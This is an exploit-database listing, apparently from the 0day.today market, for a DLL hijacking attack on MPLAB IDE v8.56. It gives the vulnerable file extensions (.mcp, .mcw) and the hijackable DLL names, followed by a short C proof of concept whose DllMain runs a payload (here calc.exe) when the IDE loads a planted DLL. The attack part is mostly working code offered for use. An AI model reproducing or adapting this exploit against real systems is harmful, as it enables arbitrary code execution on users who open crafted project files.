[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MPLAB IDE .mcp .mcw DLL Hijacking

Author
kB0]1_
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13923
Category
local exploits
Date add
31-08-2010
Platform
windows
=================================
MPLAB IDE .mcp .mcw DLL Hijacking
=================================
 
/*
 MPLAB IDE .mcw DLL Hijacking
 Date: August 31, 2010
 Author: kB0]1_
 Software: http://www.microchip.com/stellent/idcplg?IdcService=SS_GET_PAGE&nodeId=1406&dDocName=en019469&part=SW007002
 Version: v.8.56
 Vulnerable Extensions: .mcp,.mcw
 Vulnerable dll's: mfc71loc.dll,mfc71nld.dll,pe932b.dll,pe936b.dll,pegrc32b.dll
 Tested on: XP Pro SP2 & Vista SP2
*/
 
#include <windows.h>
 
int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}



#  0day.today [2024-11-16]  #